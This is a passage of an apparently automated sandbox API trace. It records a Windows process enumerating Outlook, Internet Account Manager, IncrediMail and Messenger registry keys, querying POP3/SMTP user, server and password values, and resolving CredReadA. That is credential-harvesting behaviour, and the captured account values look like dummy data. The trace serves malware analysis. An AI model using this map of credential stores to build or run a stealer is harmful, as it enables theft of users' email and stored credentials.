phkResult=0x19facc | out: phkResult=0x19facc*=0x0) returned 0x2 [0138.640] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x20019, phkResult=0x19facc | out: phkResult=0x19facc*=0x0) returned 0x2 [0138.640] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Identities", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fab0 | out: phkResult=0x19fab0*=0x1b8) returned 0x0 [0138.640] RegEnumKeyExA (in: hKey=0x1b8, dwIndex=0x0, lpName=0x19f9a4, lpcchName=0x19f57c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f574 | out: lpName="{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}", lpcchName=0x19f57c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f574) returned 0x0 [0138.640] RegOpenKeyExA (in: hKey=0x1b8, lpSubKey="{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f578 | out: phkResult=0x19f578*=0x1bc) returned 0x0 [0138.640] RegQueryValueExA (in: hKey=0x1bc, lpValueName="Username", lpReserved=0x0, lpType=0x19f558, lpData=0x8a2fe4, lpcbData=0x19f55c*=0x7f | out: lpType=0x19f558*=0x1, lpData="Main Identity", lpcbData=0x19f55c*=0xe) returned 0x0 [0138.640] RegCloseKey (hKey=0x1bc) returned 0x0 [0138.641] sprintf (in: _Dest=0x19f5a4, _Format="%s\\%s" | out: _Dest="{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\Software\\Microsoft\\Internet Account Manager\\Accounts") returned 91 [0138.641] RegOpenKeyExA (in: hKey=0x1b8, lpSubKey="{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\Software\\Microsoft\\Internet Account Manager\\Accounts", ulOptions=0x0, samDesired=0x20019, phkResult=0x19faa8 | out: phkResult=0x19faa8*=0x0) returned 0x2 [0138.641] sprintf (in: _Dest=0x19f5a4, _Format="%s\\%s" | out: _Dest="{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts") returned 101 [0138.641] RegOpenKeyExA (in: hKey=0x1b8, lpSubKey="{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x20019, phkResult=0x19faa4 | out: phkResult=0x19faa4*=0x0) returned 0x2 [0138.641] RegEnumKeyExA (in: hKey=0x1b8, dwIndex=0x1, lpName=0x19f9a4, lpcchName=0x19f580, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f578 | out: lpName="{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}", lpcchName=0x19f580, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f578) returned 0x103 [0138.641] RegCloseKey (hKey=0x1b8) returned 0x0 [0138.641] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles", ulOptions=0x0, samDesired=0x20019, phkResult=0x19facc | out: phkResult=0x19facc*=0x0) returned 0x2 [0138.641] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles", ulOptions=0x0, samDesired=0x20019, phkResult=0x19facc | out: phkResult=0x19facc*=0x0) returned 0x2 [0138.641] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles", ulOptions=0x0, samDesired=0x20019, phkResult=0x19facc | out: phkResult=0x19facc*=0x1b8) returned 0x0 [0138.641] RegEnumKeyExA (in: hKey=0x1b8, dwIndex=0x0, lpName=0x19f9ac, lpcchName=0x19f984, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f97c | out: lpName="Outlook", lpcchName=0x19f984, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f97c) returned 0x0 [0138.641] strlen (_Str="Outlook") returned 0x7 [0138.641] RegOpenKeyExA (in: hKey=0x1b8, lpSubKey="Outlook", ulOptions=0x0, samDesired=0x20019, phkResult=0x19faac | out: phkResult=0x19faac*=0x1bc) returned 0x0 [0138.641] RegEnumKeyExA (in: hKey=0x1bc, dwIndex=0x0, lpName=0x19f894, lpcchName=0x19f86c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f864 | out: lpName="03fea8ae12202041b643a9691e5b323c", lpcchName=0x19f86c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f864) returned 0x0 [0138.642] RegOpenKeyExA (in: hKey=0x1bc, lpSubKey="03fea8ae12202041b643a9691e5b323c", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f994 | out: phkResult=0x19f994*=0x1c0) returned 0x0 [0138.642] RegEnumKeyExA (in: hKey=0x1c0, dwIndex=0x0, lpName=0x19f77c, lpcchName=0x19f750, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748 | out: lpName="", lpcchName=0x19f750, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748) returned 0x103 [0138.642] RegCloseKey (hKey=0x1c0) returned 0x0 [0138.642] RegEnumKeyExA (in: hKey=0x1bc, dwIndex=0x1, lpName=0x19f894, lpcchName=0x19f874, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c | out: lpName="09917dd29831004f89474b112e58e0ab", lpcchName=0x19f874, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c) returned 0x0 [0138.642] RegOpenKeyExA (in: hKey=0x1bc, lpSubKey="09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f994 | out: phkResult=0x19f994*=0x1c0) returned 0x0 [0138.642] RegEnumKeyExA (in: hKey=0x1c0, dwIndex=0x0, lpName=0x19f77c, lpcchName=0x19f750, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748 | out: lpName="", lpcchName=0x19f750, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748) returned 0x103 [0138.642] RegCloseKey (hKey=0x1c0) returned 0x0 [0138.642] RegEnumKeyExA (in: hKey=0x1bc, dwIndex=0x2, lpName=0x19f894, lpcchName=0x19f874, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c | out: lpName="0a0d020000000000c000000000000046", lpcchName=0x19f874, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c) returned 0x0 [0138.642] RegOpenKeyExA (in: hKey=0x1bc, lpSubKey="0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f994 | out: phkResult=0x19f994*=0x1c0) returned 0x0 [0138.642] RegEnumKeyExA (in: hKey=0x1c0, dwIndex=0x0, lpName=0x19f77c, lpcchName=0x19f750, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748 | out: lpName="", lpcchName=0x19f750, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748) returned 0x103 [0138.642] RegCloseKey (hKey=0x1c0) returned 0x0 [0138.642] RegEnumKeyExA (in: hKey=0x1bc, dwIndex=0x3, lpName=0x19f894, lpcchName=0x19f874, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c | out: lpName="13dbb0c8aa05101a9bb000aa002fc45a", lpcchName=0x19f874, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c) returned 0x0 [0138.642] RegOpenKeyExA (in: hKey=0x1bc, lpSubKey="13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f994 | out: phkResult=0x19f994*=0x1c0) returned 0x0 [0138.642] RegEnumKeyExA (in: hKey=0x1c0, dwIndex=0x0, lpName=0x19f77c, lpcchName=0x19f750, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748 | out: lpName="", lpcchName=0x19f750, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748) returned 0x103 [0138.642] RegCloseKey (hKey=0x1c0) returned 0x0 [0138.642] RegEnumKeyExA (in: hKey=0x1bc, dwIndex=0x4, lpName=0x19f894, lpcchName=0x19f874, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c | out: lpName="3517490d76624c419a828607e2a54604", lpcchName=0x19f874, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c) returned 0x0 [0138.643] RegOpenKeyExA (in: hKey=0x1bc, lpSubKey="3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f994 | out: phkResult=0x19f994*=0x1c0) returned 0x0 [0138.643] RegEnumKeyExA (in: hKey=0x1c0, dwIndex=0x0, lpName=0x19f77c, lpcchName=0x19f750, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748 | out: lpName="", lpcchName=0x19f750, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748) returned 0x103 [0138.643] RegCloseKey (hKey=0x1c0) returned 0x0 [0138.643] RegEnumKeyExA (in: hKey=0x1bc, dwIndex=0x5, lpName=0x19f894, lpcchName=0x19f874, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c | out: lpName="5b59a51e8457564ab95b73c6194dc831", lpcchName=0x19f874, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c) returned 0x0 [0138.643] RegOpenKeyExA (in: hKey=0x1bc, lpSubKey="5b59a51e8457564ab95b73c6194dc831", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f994 | out: phkResult=0x19f994*=0x1c0) returned 0x0 [0138.643] RegEnumKeyExA (in: hKey=0x1c0, dwIndex=0x0, lpName=0x19f77c, lpcchName=0x19f750, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748 | out: lpName="", lpcchName=0x19f750, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748) returned 0x103 [0138.643] RegCloseKey (hKey=0x1c0) returned 0x0 [0138.643] RegEnumKeyExA (in: hKey=0x1bc, dwIndex=0x6, lpName=0x19f894, lpcchName=0x19f874, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c | out: lpName="626dbd3f36ef4b4b9263a867695919ec", lpcchName=0x19f874, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c) returned 0x0 [0138.643] RegOpenKeyExA (in: hKey=0x1bc, lpSubKey="626dbd3f36ef4b4b9263a867695919ec", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f994 | out: phkResult=0x19f994*=0x1c0) returned 0x0 [0138.643] RegEnumKeyExA (in: hKey=0x1c0, dwIndex=0x0, lpName=0x19f77c, lpcchName=0x19f750, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748 | out: lpName="", lpcchName=0x19f750, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748) returned 0x103 [0138.643] RegCloseKey (hKey=0x1c0) returned 0x0 [0138.643] RegEnumKeyExA (in: hKey=0x1bc, dwIndex=0x7, lpName=0x19f894, lpcchName=0x19f874, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c | out: lpName="8503020000000000c000000000000046", lpcchName=0x19f874, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c) returned 0x0 [0138.643] RegOpenKeyExA (in: hKey=0x1bc, lpSubKey="8503020000000000c000000000000046", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f994 | out: phkResult=0x19f994*=0x1c0) returned 0x0 [0138.644] RegEnumKeyExA (in: hKey=0x1c0, dwIndex=0x0, lpName=0x19f77c, lpcchName=0x19f750, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748 | out: lpName="", lpcchName=0x19f750, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748) returned 0x103 [0138.644] RegCloseKey (hKey=0x1c0) returned 0x0 [0138.644] RegEnumKeyExA (in: hKey=0x1bc, dwIndex=0x8, lpName=0x19f894, lpcchName=0x19f874, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c | out: lpName="9207f3e0a3b11019908b08002b2a56c2", lpcchName=0x19f874, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c) returned 0x0 [0138.644] RegOpenKeyExA (in: hKey=0x1bc, lpSubKey="9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f994 | out: phkResult=0x19f994*=0x1c0) returned 0x0 [0138.644] RegEnumKeyExA (in: hKey=0x1c0, dwIndex=0x0, lpName=0x19f77c, lpcchName=0x19f750, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748 | out: lpName="", lpcchName=0x19f750, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748) returned 0x103 [0138.644] RegCloseKey (hKey=0x1c0) returned 0x0 [0138.644] RegEnumKeyExA (in: hKey=0x1bc, dwIndex=0x9, lpName=0x19f894, lpcchName=0x19f874, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c | out: lpName="9375CFF0413111d3B88A00104B2A6676", lpcchName=0x19f874, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c) returned 0x0 [0138.644] RegOpenKeyExA (in: hKey=0x1bc, lpSubKey="9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f994 | out: phkResult=0x19f994*=0x1c0) returned 0x0 [0138.644] RegEnumKeyExA (in: hKey=0x1c0, dwIndex=0x0, lpName=0x19f77c, lpcchName=0x19f750, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748 | out: lpName="00000001", lpcchName=0x19f750, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748) returned 0x0 [0138.644] RegOpenKeyExA (in: hKey=0x1c0, lpSubKey="00000001", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f87c | out: phkResult=0x19f87c*=0x1c4) returned 0x0 [0138.644] RegQueryValueExA (in: hKey=0x1c4, lpValueName="POP3 User", lpReserved=0x0, lpType=0x19f2d0, lpData=0x19eec8, lpcbData=0x19f2cc*=0x400 | out: lpType=0x19f2d0*=0x0, lpData=0x19eec8*=0x38, lpcbData=0x19f2cc*=0x400) returned 0x2 [0138.644] RegQueryValueExA (in: hKey=0x1c4, lpValueName="IMAP User", lpReserved=0x0, lpType=0x19f2d0, lpData=0x19eec8, lpcbData=0x19f2cc*=0x400 | out: lpType=0x19f2d0*=0x0, lpData=0x19eec8*=0x38, lpcbData=0x19f2cc*=0x400) returned 0x2 [0138.645] RegQueryValueExA (in: hKey=0x1c4, lpValueName="HTTP User", lpReserved=0x0, lpType=0x19f2d0, lpData=0x19eec8, lpcbData=0x19f2cc*=0x400 | out: lpType=0x19f2d0*=0x0, lpData=0x19eec8*=0x38, lpcbData=0x19f2cc*=0x400) returned 0x2 [0138.645] RegQueryValueExA (in: hKey=0x1c4, lpValueName="SMTP User", lpReserved=0x0, lpType=0x19f2d0, lpData=0x19eec8, lpcbData=0x19f2cc*=0x400 | out: lpType=0x19f2d0*=0x0, lpData=0x19eec8*=0x38, lpcbData=0x19f2cc*=0x400) returned 0x2 [0138.645] RegCloseKey (hKey=0x1c4) returned 0x0 [0138.645] RegEnumKeyExA (in: hKey=0x1c0, dwIndex=0x1, lpName=0x19f77c, lpcchName=0x19f75c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f754 | out: lpName="00000002", lpcchName=0x19f75c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f754) returned 0x0 [0138.645] RegOpenKeyExA (in: hKey=0x1c0, lpSubKey="00000002", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f87c | out: phkResult=0x19f87c*=0x1c4) returned 0x0 [0138.645] RegQueryValueExA (in: hKey=0x1c4, lpValueName="POP3 User", lpReserved=0x0, lpType=0x19f2d0, lpData=0x19eec8, lpcbData=0x19f2cc*=0x400 | out: lpType=0x19f2d0*=0x1, lpData="lcfkj@kiekc.df", lpcbData=0x19f2cc*=0xf) returned 0x0 [0138.645] strlen (_Str="lcfkj@kiekc.df") returned 0xe [0138.645] _mbscpy (in: param_1=0x19f504, param_2=0x19f694 | out: param_1=0x19f504) returned 0x19f504 [0138.645] RegQueryValueExA (in: hKey=0x1c4, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x19f2d0, lpData=0x19eec8, lpcbData=0x19f2cc*=0x400 | out: lpType=0x19f2d0*=0x1, lpData="fgr", lpcbData=0x19f2cc*=0x4) returned 0x0 [0138.645] strlen (_Str="fgr") returned 0x3 [0138.645] RegQueryValueExA (in: hKey=0x1c4, lpValueName="Display Name", lpReserved=0x0, lpType=0x19f2d0, lpData=0x19eec8, lpcbData=0x19f2cc*=0x400 | out: lpType=0x19f2d0*=0x1, lpData="dkdjf kdil", lpcbData=0x19f2cc*=0xb) returned 0x0 [0138.645] strlen (_Str="dkdjf kdil") returned 0xa [0138.645] RegQueryValueExA (in: hKey=0x1c4, lpValueName="Email", lpReserved=0x0, lpType=0x19f2d0, lpData=0x19eec8, lpcbData=0x19f2cc*=0x400 | out: lpType=0x19f2d0*=0x1, lpData="lcfkj@kiekc.df", lpcbData=0x19f2cc*=0xf) returned 0x0 [0138.645] strlen (_Str="lcfkj@kiekc.df") returned 0xe [0138.645] RegQueryValueExA (in: hKey=0x1c4, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x19f2d0, lpData=0x19eec8, lpcbData=0x19f2cc*=0x400 | out: lpType=0x19f2d0*=0x1, lpData="rgdr", lpcbData=0x19f2cc*=0x5) returned 0x0 [0138.645] strlen (_Str="rgdr") returned 0x4 [0138.645] RegQueryValueExA (in: hKey=0x1c4, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x19f2c8, lpData=0x19f68c, lpcbData=0x19f2cc*=0x4 | out: lpType=0x19f2c8*=0x0, lpData=0x19f68c*=0x0, lpcbData=0x19f2cc*=0x4) returned 0x2 [0138.645] RegQueryValueExA (in: hKey=0x1c4, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x19f2c8, lpData=0x19f684, lpcbData=0x19f2cc*=0x4 | out: lpType=0x19f2c8*=0x0, lpData=0x19f684*=0x0, lpcbData=0x19f2cc*=0x4) returned 0x2 [0138.645] RegQueryValueExA (in: hKey=0x1c4, lpValueName="POP3 Use SPA", lpReserved=0x0, lpType=0x19f2bc, lpData=0x19f688, lpcbData=0x19f2c0*=0x4 | out: lpType=0x19f2bc*=0x0, lpData=0x19f688*=0x0, lpcbData=0x19f2c0*=0x4) returned 0x2 [0138.645] RegQueryValueExA (in: hKey=0x1c4, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x19e67c, lpData=0x19e6b8, lpcbData=0x19e6a4*=0x400 | out: lpType=0x19e67c*=0x0, lpData=0x19e6b8*=0x0, lpcbData=0x19e6a4*=0x400) returned 0x2 [0138.645] _mbscpy (in: param_1=0x19f604, param_2=0x8a2fe4 | out: param_1=0x19f604) returned 0x19f604 [0138.645] _mbscmp (_Str1=0x19f584, _Str2=0x19f504) returned -1 [0138.645] strlen (_Str="") returned 0x0 [0138.645] _mbsicmp (_Str1=0x19f584, _Str2=0x19f504) returned -1 [0138.646] RegQueryValueExA (in: hKey=0x1c4, lpValueName="IMAP User", lpReserved=0x0, lpType=0x19f2d0, lpData=0x19eec8, lpcbData=0x19f2cc*=0x400 | out: lpType=0x19f2d0*=0x0, lpData=0x19eec8*=0x72, lpcbData=0x19f2cc*=0x400) returned 0x2 [0138.646] RegQueryValueExA (in: hKey=0x1c4, lpValueName="HTTP User", lpReserved=0x0, lpType=0x19f2d0, lpData=0x19eec8, lpcbData=0x19f2cc*=0x400 | out: lpType=0x19f2d0*=0x0, lpData=0x19eec8*=0x72, lpcbData=0x19f2cc*=0x400) returned 0x2 [0138.646] RegQueryValueExA (in: hKey=0x1c4, lpValueName="SMTP User", lpReserved=0x0, lpType=0x19f2d0, lpData=0x19eec8, lpcbData=0x19f2cc*=0x400 | out: lpType=0x19f2d0*=0x0, lpData=0x19eec8*=0x72, lpcbData=0x19f2cc*=0x400) returned 0x2 [0138.646] RegCloseKey (hKey=0x1c4) returned 0x0 [0138.646] RegEnumKeyExA (in: hKey=0x1c0, dwIndex=0x2, lpName=0x19f77c, lpcchName=0x19f75c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f754 | out: lpName="00000003", lpcchName=0x19f75c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f754) returned 0x0 [0138.646] RegOpenKeyExA (in: hKey=0x1c0, lpSubKey="00000003", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f87c | out: phkResult=0x19f87c*=0x1c4) returned 0x0 [0138.646] RegQueryValueExA (in: hKey=0x1c4, lpValueName="POP3 User", lpReserved=0x0, lpType=0x19f2d0, lpData=0x19eec8, lpcbData=0x19f2cc*=0x400 | out: lpType=0x19f2d0*=0x0, lpData=0x19eec8*=0x72, lpcbData=0x19f2cc*=0x400) returned 0x2 [0138.646] RegQueryValueExA (in: hKey=0x1c4, lpValueName="IMAP User", lpReserved=0x0, lpType=0x19f2d0, lpData=0x19eec8, lpcbData=0x19f2cc*=0x400 | out: lpType=0x19f2d0*=0x0, lpData=0x19eec8*=0x72, lpcbData=0x19f2cc*=0x400) returned 0x2 [0138.646] RegQueryValueExA (in: hKey=0x1c4, lpValueName="HTTP User", lpReserved=0x0, lpType=0x19f2d0, lpData=0x19eec8, lpcbData=0x19f2cc*=0x400 | out: lpType=0x19f2d0*=0x0, lpData=0x19eec8*=0x72, lpcbData=0x19f2cc*=0x400) returned 0x2 [0138.646] RegQueryValueExA (in: hKey=0x1c4, lpValueName="SMTP User", lpReserved=0x0, lpType=0x19f2d0, lpData=0x19eec8, lpcbData=0x19f2cc*=0x400 | out: lpType=0x19f2d0*=0x0, lpData=0x19eec8*=0x72, lpcbData=0x19f2cc*=0x400) returned 0x2 [0138.646] RegCloseKey (hKey=0x1c4) returned 0x0 [0138.646] RegEnumKeyExA (in: hKey=0x1c0, dwIndex=0x3, lpName=0x19f77c, lpcchName=0x19f75c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f754 | out: lpName="00000003", lpcchName=0x19f75c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f754) returned 0x103 [0138.646] RegCloseKey (hKey=0x1c0) returned 0x0 [0138.647] RegEnumKeyExA (in: hKey=0x1bc, dwIndex=0xa, lpName=0x19f894, lpcchName=0x19f874, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c | out: lpName="9907df9e4a472f499f281fc91ee2bca1", lpcchName=0x19f874, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c) returned 0x0 [0138.647] RegOpenKeyExA (in: hKey=0x1bc, lpSubKey="9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f994 | out: phkResult=0x19f994*=0x1c0) returned 0x0 [0138.647] RegEnumKeyExA (in: hKey=0x1c0, dwIndex=0x0, lpName=0x19f77c, lpcchName=0x19f750, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748 | out: lpName="", lpcchName=0x19f750, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748) returned 0x103 [0138.647] RegCloseKey (hKey=0x1c0) returned 0x0 [0138.647] RegEnumKeyExA (in: hKey=0x1bc, dwIndex=0xb, lpName=0x19f894, lpcchName=0x19f874, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c | out: lpName="b4c13fbaf5f22f44b93e8bdd93521484", lpcchName=0x19f874, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c) returned 0x0 [0138.647] RegOpenKeyExA (in: hKey=0x1bc, lpSubKey="b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f994 | out: phkResult=0x19f994*=0x1c0) returned 0x0 [0138.647] RegEnumKeyExA (in: hKey=0x1c0, dwIndex=0x0, lpName=0x19f77c, lpcchName=0x19f750, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748 | out: lpName="", lpcchName=0x19f750, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748) returned 0x103 [0138.647] RegCloseKey (hKey=0x1c0) returned 0x0 [0138.647] RegEnumKeyExA (in: hKey=0x1bc, dwIndex=0xc, lpName=0x19f894, lpcchName=0x19f874, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c | out: lpName="dc184acfc7e1614eb31843d1abdfd43e", lpcchName=0x19f874, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c) returned 0x0 [0138.647] RegOpenKeyExA (in: hKey=0x1bc, lpSubKey="dc184acfc7e1614eb31843d1abdfd43e", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f994 | out: phkResult=0x19f994*=0x1c0) returned 0x0 [0138.647] RegEnumKeyExA (in: hKey=0x1c0, dwIndex=0x0, lpName=0x19f77c, lpcchName=0x19f750, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748 | out: lpName="", lpcchName=0x19f750, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748) returned 0x103 [0138.647] RegCloseKey (hKey=0x1c0) returned 0x0 [0138.647] RegEnumKeyExA (in: hKey=0x1bc, dwIndex=0xd, lpName=0x19f894, lpcchName=0x19f874, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c | out: lpName="f86ed2903a4a11cfb57e524153480001", lpcchName=0x19f874, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c) returned 0x0 [0138.647] RegOpenKeyExA (in: hKey=0x1bc, lpSubKey="f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f994 | out: phkResult=0x19f994*=0x1c0) returned 0x0 [0138.647] RegEnumKeyExA (in: hKey=0x1c0, dwIndex=0x0, lpName=0x19f77c, lpcchName=0x19f750, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748 | out: lpName="", lpcchName=0x19f750, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f748) returned 0x103 [0138.648] RegCloseKey (hKey=0x1c0) returned 0x0 [0138.648] RegEnumKeyExA (in: hKey=0x1bc, dwIndex=0xe, lpName=0x19f894, lpcchName=0x19f874, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c | out: lpName="f86ed2903a4a11cfb57e524153480001", lpcchName=0x19f874, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f86c) returned 0x103 [0138.648] RegCloseKey (hKey=0x1bc) returned 0x0 [0138.648] RegEnumKeyExA (in: hKey=0x1b8, dwIndex=0x1, lpName=0x19f9ac, lpcchName=0x19f98c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f984 | out: lpName="Outlook", lpcchName=0x19f98c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x19f984) returned 0x103 [0138.648] RegCloseKey (hKey=0x1b8) returned 0x0 [0138.648] FreeLibrary (hLibModule=0x76680000) returned 1 [0138.650] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\IncrediMail\\Identities", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fabc | out: phkResult=0x19fabc*=0x0) returned 0x2 [0138.650] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\IncrediMail\\Identities", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fabc | out: phkResult=0x19fabc*=0x0) returned 0x2 [0138.650] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Group Mail", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f868 | out: phkResult=0x19f868*=0x0) returned 0x2 [0138.650] _mbscpy (in: param_1=0x19f9a3, param_2=0x413fc4 | out: param_1=0x19f9a3) returned 0x19f9a3 [0138.650] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\MSNMessenger", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f694 | out: phkResult=0x19f694*=0x0) returned 0x2 [0138.650] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\MessengerService", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f690 | out: phkResult=0x19f690*=0x0) returned 0x2 [0138.651] _mbscpy (in: param_1=0x19f533, param_2=0x413fc4 | out: param_1=0x19f533) returned 0x19f533 [0138.651] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x74c60000 [0138.651] GetProcAddress (hModule=0x74c60000, lpProcName="CredReadA") returned 0x74c958f0 